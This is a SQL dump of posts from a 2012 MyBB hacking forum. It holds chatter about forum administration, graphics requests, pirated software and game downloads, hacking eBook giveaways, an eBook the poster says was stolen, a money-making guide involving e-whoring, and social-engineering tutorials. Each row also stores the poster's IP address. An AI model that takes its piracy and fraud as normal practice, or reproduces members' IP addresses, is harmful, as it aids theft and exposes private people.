INTO mybb_posts VALUES('1944', '193', '873', '59', 'RE: 150+ Free Hacking eBooks Collection', '0', '100', '??zg???g????61', '1347643310', '[quote=\'iTzIpod\' pid=\'873\' dateline=\'1345867189\']\n[quote=\'GRONgamer61\' pid=\'720\' dateline=\'1345774110\']\nthe Network Security download is locked with a password... --...--\n[/quote]\n\nOh? I\'ll see if I can crack it. Or ask for the password :p\n\n\nThanks! any luck?', '96.237.179.21', '1626190613', '1', '0', '100', '1347643371', '1', '3f1c5434a965a66355b5964ae97bda8f', '0', '1347643371'); INSERT INTO mybb_posts VALUES('1945', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '112', '??????Z', '1347643621', 'Just read your Ebook, really nice intro for beginners. nice work :)', '92.23.147.171', '1545049003', '1', '0', '0', '0', '1', '808dbcdc8deb35f92b9ba616b4eb9e79', '0', '0'); INSERT INTO mybb_posts VALUES('1946', '420', '1927', '49', 'RE: [Suggestion] Mods/+ Can Edit Threads without the duration thing', '0', '1', 't3h jok3r', '1347646344', 'I thought I fixed the time limit. I will work on this when I get back home. At hovercatz, we do not allow two posts by the same poster under a certain time to avoid double posting but we will take this under consideration.\n\nLeaving this open, I will let you know when its done so you guys can give it a check.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2ac0087e839f095667c944cdd5c8edc5', '0', '0'); INSERT INTO mybb_posts VALUES('1947', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '1', 't3h jok3r', '1347646678', 'Reloadzer you never fail to impress me with your GFX skills. I like the second one more.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2b0e558bc845205f6fbc3b1c714de4de', '0', '0'); INSERT INTO mybb_posts VALUES('1948', '18', '49', '2', 'RE: star test', '0', '1', 't3h jok3r', '1347647046', 'Neither am I, I found this theme and it was a pretty good free theme just it had a lot of bugs, I fixed the problems and due to these problems only some people use this theme so. I picked this theme because its dark, unique and idk\n\nI know staff didn\'t get any update lol but trust out of all the choices the current one is the best.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '34c5c6a3026a418cf8e9ce9f0d10dfeb', '0', '0'); INSERT INTO mybb_posts VALUES('1949', '429', '0', '2', 'testing similes', '0', '1', 't3h jok3r', '1347647241', ':) :shocked: :( :whistle: ;) :shy: :umm: :hehe: :P :thinking: :D :opps: :uh yeah: :cool: :roflol: :lol: :mhm: :grrr: :angel: :?:\n\nTesting smilies', '72.231.24.165', '1223104677', '1', '0', '1', '1347666859', '1', 'e4a21df22ad2e2cf3979ee7bcd27be7a', '0', '1347666859'); INSERT INTO mybb_posts VALUES('1950', '429', '1949', '2', 'RE: testing similes', '0', '1', 't3h jok3r', '1347647280', 'And I found an error.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0cdcdcda4fa10cac941a6f2004bd0853', '0', '0'); INSERT INTO mybb_posts VALUES('1951', '430', '0', '9', '? ?[3$]How to make Money Online![2 Methods] Earn +500$ A month|Autobuy![Vouch]', '0', '53', 'sirchamp', '1347647305', '[size=xx-small]Notes: Im posting this thread here because there is no Marketplace Section\r\n\r\n\r\n\r\n\r\n\r\n[size=xx-large][color=#FF0000]New Price!! Only 3 Dollars\r\n\r\n\r\n[/size]\r\n[img]http://i.imgur.com/o6jPW.jpg[/img]\r\n\r\n[color=#FF0000][size=large]Template:\r\nTitle: How to make money Online\r\nAuthor: Sirchamp\r\nPages: 13\r\nDescription: This book contains 2 Methods on how to make money online\r\nPayment Options: Paypal, Pm me for Liberty Reserve\r\nCopies Available: Unlimited\r\nResale Rights: [size=x-large]Normally 20$[/size]. This can vary. Pm me if you want to resale\r\nPrice: 3$\r\n[/size][/color]\r\n\r\n\r\n[color=#FFD700][size=large]Payment Proof[/size][/color]\r\n\r\n[IMG]http://i.imgur.com/WtKOb.jpg[/IMG] \r\n\r\n\r\n\r\n[color=#32CD32][size=xx-large]Press the link below to autobuy the E-Book[/size][/color]\r\nhttp://uploadnsell.com/buy/nzjs3d[/color][/size]\r\n\r\n[color=#32CD32][size=x-large]\r\n\r\nReview[/size][/color](of Happy Forums, HF, Hack*cough*forum)\r\n\r\n[quote]Quality of information: 3.5/5\r\n\r\nThe quality of the information in the ebook is good. One method I knew, the other I did not. The first\r\nmethod is e-whoring, be aware of that. The second one however is something else, I did not know something like that could be produced. The second method is great & a private one. It will work.\r\n\r\nEase: 4/5\r\n\r\nThis first method can be applied, required you the have time. It takes a little time like 2-3 hours to get started, but once done, you have to work after 2-3 days. The second method however only takes 5-15 minutes & earns you within an hour or two.\r\n\r\nLayout: 3/5\r\n\r\nLayout was ok. After all, it is the info that matters. Nothing to dull, nothing to bright\r\n\r\nPros:\r\n\r\nThorougly explained\r\nLegal, Whitehat\r\nSemi-Autopilot\r\nPictures & videos\r\n\r\nCons:\r\n\r\nFirst method is public\r\nRequires patience\r\n\r\nNote: This is my personal review of this ebook.\r\n\r\nRegards-\r\nDkc379(member of nearly reviewers) \r\n[/quote]\r\n\r\n\r\n\r\n\r\n[color=#32CD32][size=x-large]Review[/size][/color][color=#32CD32](of LH)[/color]\r\n[quote]\r\nEbook review by Jok3r\r\n\r\n\r\nQuality of Information (3/5)\r\n\r\nWell-explained ebook. This ebook contains two different monetizing techniques, in fact we even have a sub-forum for one of the technique. His ebook explains even contains a video on how to do one of the method and you can get full support on LH on the technique so it\'s safe to buy this ebook. The second method is kinda unique but seems high rewarding.\r\n\r\nEase (5/5)\r\n\r\nBoth methods are easy, just require some patience. The first method is public and kinda saturated but you can earn shit loads of money. I would recommend 15+ to look forward to buy this ebook.\r\n\r\nLayout (5/5)\r\n\r\nFont and text size are easy to see and read, contains steps including pictures, includes author email for inquiries, white background but short yet well-explained ebook.\r\n\r\nThis is a review of the ebook, we do not endorse or vouch for this ebook in any way. This my opinion and may vary with others.[/quote]', '188.155.56.90', '-1130678182', '1', '0', '53', '1348151179', '1', '74db47bc6fce1e6d93bfef9effbc3683', '0', '1348151179'); INSERT INTO mybb_posts VALUES('1954', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '62', 'R?????zo?', '1347649248', 'thanks, I try to do my best :P\nhopefully OP likes it aswell', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'b9735784ceb3b532cabb1abb9cca246b', '0', '0'); INSERT INTO mybb_posts VALUES('1952', '430', '1951', '9', 'RE: ? ?[7.99]How to make Money Online![2 Methods] Earn +500$ A month|Autobuy![Vouch]', '0', '1', 't3h jok3r', '1347647525', 'That\'s not a vouch, its an review by the reviewers group. Pm me, NXK or apathy a vouch copy if you would like q vouch or are willing to send out a vouch copy.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '98d2ef123bf06fd903d683e9294e8b70', '0', '0'); INSERT INTO mybb_posts VALUES('1953', '337', '1587', '15', 'RE: [HOT] Syslogger LATEST VERSION [HOT]', '0', '100', '??zg???g????61', '1347649070', 'Well this WAS posted in Unique\'s section... 0_0', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', 'b6e37aa1dfdc29132f5763eba264bfca', '0', '0'); INSERT INTO mybb_posts VALUES('1955', '428', '1942', '74', 'RE: Dark Steam | Free Steam Games', '0', '62', 'R?????zo?', '1347649625', 'thanks for sharing it might come useful.\nI got 2 questions though:\n\ncan you play online games with original steam users aka non cracked servers?\nare the games usually updated, like when some game is released on steam is also released there?\n\nnever the less, nice share.', '94.132.244.168', '1585771688', '1', '0', '62', '1347649649', '1', '2da089f2a35746480446bd302eb5ccfa', '0', '1347649649'); INSERT INTO mybb_posts VALUES('1956', '302', '1405', '53', 'RE: Java DoS Script', '0', '53', 'sirchamp', '1347649945', 'Hahah it will print\" fuck yo cpu\" on your screen. Fake tool. Look at this \"vir=(vir+10)*10/1000000;\" hahaha.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'f5f98d87d6e668a025053d5ee1d39879', '0', '0'); INSERT INTO mybb_posts VALUES('1957', '431', '0', '61', '[Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1347649952', 'I will be doing some GFX work for free for Unique members only, all you have to do is just post what you want using the template below:\n\n[code]Size:\nColour Scheme:\nRender/Image:\nText:\nAnything else:[/code]\n\nI can do pretty much everything from avatars, signatures, banners.\nJust not thread designs since I\'m kinda short on time lately.\nPost here with your request, and I will make it as soon as possible.', '94.132.244.168', '1585771688', '1', '0', '82', '1347931450', '1', '2bc65279ae767b8cef07e8303d1edd09', '0', '1347931450'); INSERT INTO mybb_posts VALUES('1958', '426', '1940', '30', 'RE: [100% Virus Free] Photoshop CS5', '0', '53', 'sirchamp', '1347650028', 'ReUpload Thanks. File blocked for Violation', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '69b0585040e61a8261384f2989632884', '0', '0'); INSERT INTO mybb_posts VALUES('1959', '426', '1958', '30', 'RE: [100% Virus Free] Photoshop CS5', '0', '82', 'iTzIpod', '1347650630', '[quote=\'sirchamp\' pid=\'1958\' dateline=\'1347650028\']\r\nReUpload Thanks. File blocked for Violation\r\n[/quote]\r\n\r\nAlright. I will do it in a few.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c027d08fc51f82e6b312b0caee48e02b', '0', '0'); INSERT INTO mybb_posts VALUES('1960', '431', '1957', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '82', 'iTzIpod', '1347650771', '[quote=\'R?????zo?\' pid=\'1957\' dateline=\'1347649952\']\r\nI will be doing some GFX work for free for Unique members only, all you have to do is just post what you want using the template below:\r\n\r\n[code]Size:\r\nColour Scheme:\r\nRender/Image:\r\nText:\r\nAnything else:[/code]\r\n\r\nI can do pretty much everything from avatars, signatures, banners.\r\nJust not thread designs since I\'m kinda short on time lately.\r\nPost here with your request, and I will make it as soon as possible.\r\n[/quote]\r\n\r\n1. Thanks for contributing to Unique. =]\r\nBut I\'m fine for now. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0cca9321f440270f4b58b2ab26563bb3', '0', '0'); INSERT INTO mybb_posts VALUES('1961', '193', '1944', '59', 'RE: 150+ Free Hacking eBooks Collection', '0', '82', 'iTzIpod', '1347650871', '[quote=\'GRONgamer61\' pid=\'1944\' dateline=\'1347643310\']\r\n[quote=\'iTzIpod\' pid=\'873\' dateline=\'1345867189\']\r\n[quote=\'GRONgamer61\' pid=\'720\' dateline=\'1345774110\']\r\nthe Network Security download is locked with a password... --...--\r\n[/quote]\r\n\r\nOh? I\'ll see if I can crack it. Or ask for the password :p\r\n\r\n\r\nThanks! any luck?\r\n[/quote]\r\n\r\nI tried to crack it. But didn\'t get any luck. And I would try to ask for the password but I am banned on HF. (IP Banned)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8a3a63994ee531b8dc1c66abddd4b47d', '0', '0'); INSERT INTO mybb_posts VALUES('1962', '418', '1945', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '82', 'iTzIpod', '1347650940', '[quote=\'??????Z\' pid=\'1945\' dateline=\'1347643621\']\r\nJust read your Ebook, really nice intro for beginners. nice work :)\r\n[/quote]\r\n\r\nThanks.\r\nI hope it will help a majority of the users that try to SE.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a3d489c961c922fbc6a9ba7c740bfd20', '0', '0'); INSERT INTO mybb_posts VALUES('1963', '428', '1955', '74', 'RE: Dark Steam | Free Steam Games', '0', '82', 'iTzIpod', '1347651095', '[quote=\'R?????zo?\' pid=\'1955\' dateline=\'1347649625\']\r\nthanks for sharing it might come useful.\r\nI got 2 questions though:\r\n\r\n[b]can you play online games with original steam users aka non cracked servers?[/b]\r\n[u]are the games usually updated, like when some game is released on steam is also released there?\r\n[/u]\r\nnever the less, nice share.\r\n[/quote]\r\n\r\nYou\'re welcome Reloadzor. =]\r\n\r\n@Bolded Text, That, I am not sure. But I would appreciate if you try it and post feedback?\r\n@Underlinded Text, Yes. They update the games. Be sure to check out www.darksteam.info =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fc604dc0c6878b6a38729474bbe580a3', '0', '0'); INSERT INTO mybb_posts VALUES('1964', '421', '1929', '49', 'RE: [Suggestion] Upgraded Members get no waiting time', '0', '20', 'JakeUS', '1347651552', 'What do you mean by waiting time?', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '986b83851bbbdff60f60aeaadc580b42', '0', '0'); INSERT INTO mybb_posts VALUES('1965', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '82', 'iTzIpod', '1347651586', 'Editted the thread.\n\n5+ Posts and at least 1 day registered.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6bacc1ad9042ae19c7351bd6175eeaa6', '0', '0'); INSERT INTO mybb_posts VALUES('1966', '421', '1964', '49', 'RE: [Suggestion] Upgraded Members get no waiting time', '0', '82', 'iTzIpod', '1347651813', '[quote=\'JakeUS\' pid=\'1964\' dateline=\'1347651552\']\nWhat do you mean by waiting time?\n[/quote]\n\nThere is that post thing. That makes you wait a couple seconds to post. I just call it \"waiting time\".\n\nSorry for the mix up.', '24.212.197.164', '416597412', '1', '0', '82', '1347651841', '1', '6451df8dea5b13ed0adcaf67aa750a91', '0', '1347651841'); INSERT INTO mybb_posts VALUES('1967', '383', '1765', '29', 'RE: Paypal Withdrawy to cash or debit card [TUT DL]', '0', '53', 'sirchamp', '1347653342', 'Asking for rep is forbidden. LQ ..', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '4f0e74defb12397f84322c770663ed65', '0', '0'); INSERT INTO mybb_posts VALUES('1968', '432', '0', '61', '145+ eBooks Giveaway', '0', '82', 'iTzIpod', '1347654427', 'Enjoy.\r\nImage: \r\n[img]http://icap.me/i/HUlIFDars2.png[/img]\r\n\r\nDownload: https://dl.dropbox.com/u/57903257/145%20ebooks.zip', '24.212.197.164', '416597412', '1', '0', '82', '1347664814', '1', 'd85040e75062bd83de22b9185617ea5b', '0', '1347664814'); INSERT INTO mybb_posts VALUES('1969', '433', '0', '61', '2000+ eBooks Giveaway', '0', '82', 'iTzIpod', '1347654511', 'Hey guys!\r\n\r\nThis is a thread giving away 2k+ eBooks. I don\'t know what they are about though.\r\n\r\nPlease leave a thank you down below!\r\n\r\n[url=http://hightechmodz.com/E-Books.html]Link to 2k E-books[/url]\r\n\r\nEnjoy guys!', '24.212.197.164', '416597412', '1', '0', '82', '1347664573', '1', '04fbb5b31377ce9a460736b532fb5ccf', '0', '1347664573'); INSERT INTO mybb_posts VALUES('1970', '345', '1954', '63', 'RE: Need userbar! [Gamers]', '0', '61', 'NXK', '1347654994', '[quote=\'R?????zo?\' pid=\'1954\' dateline=\'1347649248\']\r\nthanks, I try to do my best :P\r\nhopefully OP likes it aswell\r\n[/quote]\r\n\r\nIt\'s nice it\'s just not something I\'m really into. \r\n\r\nIll wait and see if anyone else comes up with anything.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '3028d04077f10bcbc4cb3468c8e016dd', '0', '0'); INSERT INTO mybb_posts VALUES('1971', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '82', 'iTzIpod', '1347662568', 'NXK what font did you use for your Userbars?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '534d1eb7dfafebcffb8882724cd39a03', '0', '0'); INSERT INTO mybb_posts VALUES('1972', '345', '1970', '63', 'RE: Need userbar! [Gamers]', '0', '1', 't3h jok3r', '1347663555', '[quote=\'NXK\' pid=\'1970\' dateline=\'1347654994\']\r\n[quote=\'R?????zo?\' pid=\'1954\' dateline=\'1347649248\']\r\nthanks, I try to do my best :P\r\nhopefully OP likes it aswell\r\n[/quote]\r\n\r\nIt\'s nice it\'s just not something I\'m really into. \r\n\r\nIll wait and see if anyone else comes up with anything.\r\n[/quote]\r\n\r\nUmm are you saying it because of the font?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1e25b4216dcb86444100b4a30ad25b29', '0', '0'); INSERT INTO mybb_posts VALUES('1973', '345', '1972', '63', 'RE: Need userbar! [Gamers]', '0', '82', 'iTzIpod', '1347663688', '[quote=\'t3h jok3r\' pid=\'1972\' dateline=\'1347663555\']\r\n[quote=\'NXK\' pid=\'1970\' dateline=\'1347654994\']\r\n[quote=\'R?????zo?\' pid=\'1954\' dateline=\'1347649248\']\r\nthanks, I try to do my best :P\r\nhopefully OP likes it aswell\r\n[/quote]\r\n\r\nIt\'s nice it\'s just not something I\'m really into. \r\n\r\nIll wait and see if anyone else comes up with anything.\r\n[/quote]\r\n\r\nUmm are you saying it because of the font?\r\n[/quote]\r\n\r\nIn my opinion, it\'s the font I only don\'t like. Although it might look good with the font NXK used.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7eec7f56d16ca3f431f93efd089ab538', '0', '0'); INSERT INTO mybb_posts VALUES('1974', '419', '1926', '49', 'RE: [Suggestion] Signature Characters + for + Members', '0', '1', 't3h jok3r', '1347663878', 'There\'s not plugin I believe that can do this. I will do a research, if I can\'t figure it out then I guess the suggestion gets declined.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'df9c6c34ad90e0c34e08661eebbea3cb', '0', '0'); INSERT INTO mybb_posts VALUES('1975', '421', '1929', '49', 'RE: [Suggestion] Upgraded Members get no waiting time', '0', '1', 't3h jok3r', '1347664130', 'Waiting time is the right word, some may call it post flood or thread flood.\n\nI have lowered it, but I can\'t remove it because I can\'t let some members go on spamming with posts. They need a break.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5b9cd1d4759509163a2646d80add8cfa', '0', '0'); INSERT INTO mybb_posts VALUES('1976', '345', '1973', '63', 'RE: Need userbar! [Gamers]', '0', '1', 't3h jok3r', '1347664279', '[quote=\'iTzIpod\' pid=\'1973\' dateline=\'1347663688\']\r\n[quote=\'t3h jok3r\' pid=\'1972\' dateline=\'1347663555\']\r\n[quote=\'NXK\' pid=\'1970\' dateline=\'1347654994\']\r\n[quote=\'R?????zo?\' pid=\'1954\' dateline=\'1347649248\']\r\nthanks, I try to do my best :P\r\nhopefully OP likes it aswell\r\n[/quote]\r\n\r\nIt\'s nice it\'s just not something I\'m really into. \r\n\r\nIll wait and see if anyone else comes up with anything.\r\n[/quote]\r\n\r\nUmm are you saying it because of the font?\r\n[/quote]\r\n\r\nIn my opinion, it\'s the font I only don\'t like. Although it might look good with the font NXK used.\r\n[/quote]\r\n\r\nWell if he changes the size and doesn\'t use a border then it might look better.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7e2d8dbaa21b0ea4262bd7ea05749838', '0', '0'); INSERT INTO mybb_posts VALUES('1977', '433', '1969', '61', 'RE: eBooks Giveaway', '0', '1', 't3h jok3r', '1347664320', 'Why not take a screenshot of some of them?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'befa6db5015bbc736d596092f2c2946b', '0', '0'); INSERT INTO mybb_posts VALUES('1978', '432', '1968', '61', 'RE: eBooks Giveaway', '0', '1', 't3h jok3r', '1347664343', 'It would be better to change the title, because you have the same title for two threads.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c95237baed105f6503a5b93105c89674', '0', '0'); INSERT INTO mybb_posts VALUES('1979', '431', '1957', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '1', 't3h jok3r', '1347664425', 'Size: Dunno\nColour Scheme: Black, Red, Grey, Silver or white\nRender/Image: http://i410.photobucket.com/albums/pp181/GraphicDanny/blank-template.png\nText: Admin\nAnything else: This is going to be the admin userbar.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '743e6a517176d83401e3365d1db71163', '0', '0'); INSERT INTO mybb_posts VALUES('1980', '433', '1977', '61', 'RE: eBooks Giveaway', '0', '82', 'iTzIpod', '1347664544', '[quote=\'t3h jok3r\' pid=\'1977\' dateline=\'1347664320\']\r\nWhy not take a screenshot of some of them?\r\n[/quote]\r\n\r\nI don\'t own them.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '268f3cab1b21a25feb51f2a6e6d5bac1', '0', '0'); INSERT INTO mybb_posts VALUES('1981', '434', '0', '61', 'Money Making eBook', '0', '82', 'iTzIpod', '1347664759', 'This eBook was stolen using the UploadNSell Method.\n\nDownload: http://www.mediafire.com/?9didxjc47kebh58\n\n\n\nView: http://www.mediafire.com/view/?9didxjc47kebh58', '24.212.197.164', '416597412', '1', '0', '82', '1347664787', '1', '89c63804e5930f4e401e71f40fd1e1b4', '0', '1347664787'); INSERT INTO mybb_posts VALUES('1982', '432', '1968', '61', 'RE: 145+ eBooks Giveaway', '0', '82', 'iTzIpod', '1347664886', 'Alright. Thanks for the heads up. Done.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '46f10d20e1e5ac5e8c48ecd77d765f47', '0', '0'); INSERT INTO mybb_posts VALUES('1983', '345', '1976', '63', 'RE: Need userbar! [Gamers]', '0', '61', 'NXK', '1347665593', 'I don\'t know it\'s just the colors/ the font. I\'m not a fan of really dark things.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'c64f4296ab9d64ab713b46b002fe0cb0', '0', '0'); INSERT INTO mybb_posts VALUES('1984', '435', '0', '4', 'Newbie Here', '0', '188', 'Lonnie', '1347666181', 'Well hello there. I am Lonnie. A friend of iTzIpod. Hello to you all.', '68.83.86.251', '1146312443', '0', '0', '0', '0', '1', '855672678efad30a28bb8e0ac26f46a0', '0', '0'); INSERT INTO mybb_posts VALUES('1985', '435', '1984', '4', 'RE: Newbie Here', '0', '82', 'iTzIpod', '1347666265', 'Hey Lonnie, sup?\n\nThanks for registering under my referral! <3 After asking like 80 friends, someone actually registered. Thanks <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c4827d1fdd86cef981eff79f83d19938', '0', '0'); INSERT INTO mybb_posts VALUES('1986', '435', '1985', '4', 'RE: Newbie Here', '0', '188', 'Lonnie', '1347666597', '[quote=\'iTzIpod\' pid=\'1985\' dateline=\'1347666265\']\r\nHey Lonnie, sup?\r\n\r\nThanks for registering under my referral! <3 After asking like 80 friends, someone actually registered. Thanks <3\r\n[/quote]\r\n\r\n\r\nThat\'s cause I am a good friend. ;D', '68.83.86.251', '1146312443', '0', '0', '0', '0', '1', '3364d101ad3b1d6d333d4f21e79839bb', '0', '0'); INSERT INTO mybb_posts VALUES('1987', '331', '1545', '5', 'RE: New Rules and Instructions v.4', '0', '1', 't3h jok3r', '1347666828', 'Updated. Added junk tool moderation action requirement and administrative notes.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8e8cbc9e9cae0927a8bf1799f4e3d19d', '0', '0'); INSERT INTO mybb_posts VALUES('1988', '436', '0', '7', 'Motivation', '0', '82', 'iTzIpod', '1347671765', 'Wow..\r\nI noticed that we lost a lot of active members ever since School started. :/\r\nLets all try to stay active and post daily to maintain our activity. This way, we are all growing at a strong and easy pace.\r\n\r\n\r\n- Unique\'s Leader\r\niTzIpod', '24.212.197.164', '416597412', '1', '0', '82', '1347671797', '1', '71a4941078be31ab4062a20120e53e0b', '0', '1347671797'); INSERT INTO mybb_posts VALUES('1989', '368', '1800', '47', 'RE: 5 free @l33thacking.net forwarders', '0', '1', 't3h jok3r', '1347675176', '[quote=\'NXK\' pid=\'1800\' dateline=\'1347375623\']\r\nId like one, make me look alittle more legit. I have more than 3 threads that are HQ.\r\n[/quote]\r\n\r\nHow the fuck did I miss you out? My bad anyway you have to make 3 HQ threads after you check in.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cffb302a6b4151b0b95bc6e297fd2967', '0', '0'); INSERT INTO mybb_posts VALUES('1990', '38', '1856', '16', 'RE: [tut] How to lie like a pro', '0', '1', 't3h jok3r', '1347675210', '[quote=\'iTzIpod\' pid=\'1856\' dateline=\'1347493805\']\r\nCool tutorial :3\r\n\r\nI\'m not a good liar.. :/\r\n[/quote]\r\n\r\nI use to be a good liar, I could look into eyes and lie.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '97abdd41e8ccd96838dc13e70671fa60', '0', '0'); INSERT INTO mybb_posts VALUES('1991', '363', '1706', '8', 'RE: Top 10 songs of September 2012', '0', '1', 't3h jok3r', '1347675255', 'Heard that song once before.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '47609fa223b200640c29576ac6f9289f', '0', '0'); INSERT INTO mybb_posts VALUES('1992', '363', '1706', '8', 'RE: Top 10 songs of September 2012', '0', '82', 'iTzIpod', '1347675399', 'I didn\'t like that song.\n\nI actually like this song :p\n\n\nKevin Rudolf - Champions\n\nMore than that one @NXK.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'adfb9eff8e97e1e98fcc4e98b0b2b222', '0', '0'); INSERT INTO mybb_posts VALUES('1993', '435', '1984', '4', 'RE: Newbie Here', '0', '1', 't3h jok3r', '1347675409', 'Welcome to L33THacking Lonnie, feel free to contact me if you have any questions or reports.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd846424cd23688f0f7f0dda6ca37cd8d', '0', '0'); INSERT INTO mybb_posts VALUES('1994', '38', '1990', '16', 'RE: [tut] How to lie like a pro', '0', '82', 'iTzIpod', '1347675467', '[quote=\'t3h jok3r\' pid=\'1990\' dateline=\'1347675210\']\r\n[quote=\'iTzIpod\' pid=\'1856\' dateline=\'1347493805\']\r\nCool tutorial :3\r\n\r\nI\'m not a good liar.. :/\r\n[/quote]\r\n\r\nI use to be a good liar, I could look into eyes and lie.\r\n[/quote]\r\nLOL I can\'t even master that..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8e38839dcd0e742a2d16b4cd1b18a1c5', '0', '0'); INSERT INTO mybb_posts VALUES('1995', '437', '0', '3', 'Help keep LH up', '0', '1', 't3h jok3r', '1347676177', 'LH obviously needs to money to stay up. Since LH is forever ADs free website, I will post some adf.ly links below so LH could earn something. Donations are most welcome.\n\nL33THACKING: http://adf.ly/AeOpy\nHotspotshield: http://adf.ly/3oGgX\nFake inbox emailer: http://adf.ly/3oGes\nCraigslist: http://adf.ly/3oH9N\nVulcan cookie cleaner: http://adf.ly/5HprD\nCCleaner: http://adf.ly/7gyux\nMalwarebytes: http://adf.ly/7gyt7\n\nIf you click any link above then please post below. \n\n[b]Why post below?[/b]\n\n1. It will increase forum activity, especially your post count\n2. This thread will get bumped.\n\n[b]Jok3r can\'t afford to run LH?[/b]\n\nI can afford to run LH, but the thing is that I buy advertisements on different sites everyday which costs a lot then hosting, protection, domain, plugins, graphics etc is another cost. So far within 3 months (1st month was maintenance month) I have spent over $150 bucks and earned 0 cents. I was planning to take down LH few days ago but I don\'t quit to quickly. Please tell your friends and if possible buy stickies, donations are welcome and if you have more than 10 posts you will get a 50% discount in forum upgrades. LH is hosted on two different hostings so hosts itself cost a lot.', '72.231.24.165', '1223104677', '1', '0', '1', '1347676597', '1', '76ce196f547f97e7e991e4e9c28cafd0', '0', '1347676597'); INSERT INTO mybb_posts VALUES('1996', '378', '1742', '7', 'RE: How is school for you?', '0', '1', 't3h jok3r', '1347676666', 'Luckily all my new teachers are awesome but my new schools building is kinda small, can\'t believe it\'s a popular school.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3a5e543ad753deecd5935c32c7e7f205', '0', '0'); INSERT INTO mybb_posts VALUES('1997', '412', '1919', '7', 'RE: 400th Thread', '0', '1', 't3h jok3r', '1347676741', '[quote=\'iTzIpod\' pid=\'1919\' dateline=\'1347628172\']\r\n[quote=\'t3h jok3r\' pid=\'1906\' dateline=\'1347593867\']\r\nCongratz on the 400 threads LH and 400 posts iTzIpod, the more activity we have the more backlinks we will have which means more HQ members.\r\n[/quote]\r\n\r\nThanks! :D\r\n\r\n@Apathy, Gratz on 100 posts :3\r\n[/quote]\r\n\r\nYou made me lol. We are talking about reaching a huge milestone which is 400 threads and you congratulated Apathy for 100 posts. Nothing against anyone, just saying it\'s funny.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8ca168824da5efc55d4641276b5f7b9d', '0', '0'); INSERT INTO mybb_posts VALUES('1998', '436', '1988', '7', 'RE: Motivation', '0', '1', 't3h jok3r', '1347676779', 'I think it\'s because we getting known AND schools have started so people are getting off from holidays and now staying more at home.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd9988acf9eace493a6c59f4f97e4b002', '0', '0'); INSERT INTO mybb_posts VALUES('2037', '388', '1781', '52', 'RE: Request for the coders group', '0', '7', 'Romdu62', '1347684352', 'I put it everything and selected metropcs. I said 10 SMS but none send to my phone.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '5430a5a287bb9ef4c60962f6a9179cbf', '0', '0'); INSERT INTO mybb_posts VALUES('2000', '417', '1911', '4', 'RE: HI!', '0', '9', 'p420', '1347676924', 'Welcome to L33THacking homeless, You have come to the right place. Hope you like L33THacking and enjoy.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '21604f32dfe1156d1af96220777a7c59', '0', '0'); INSERT INTO mybb_posts VALUES('2001', '435', '1984', '4', 'RE: Newbie Here', '0', '9', 'p420', '1347676989', 'Welcome to L33THacking Lonnie. Hope you enjoy your stay.', '72.231.24.165', '1223104677', '0', '0', '9', '1347681176', '1', 'b86b06dbda6f35857d32204f79f3564a', '0', '1347681176'); INSERT INTO mybb_posts VALUES('2002', '428', '1942', '74', 'RE: Dark Steam | Free Steam Games', '0', '188', 'Lonnie', '1347677014', 'Thanks for sharing! I must try downloading this Sunday', '68.83.86.251', '1146312443', '0', '0', '0', '0', '1', '4726478ac00fd8650a6b05e693914c72', '0', '0'); INSERT INTO mybb_posts VALUES('2003', '422', '1936', '19', 'RE: [Read] Announcement', '0', '9', 'p420', '1347677213', 'You made a lot of contributions in this group, by the way this is an invite only group right?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'b11849e11da6bc3168544737536f2810', '0', '0'); INSERT INTO mybb_posts 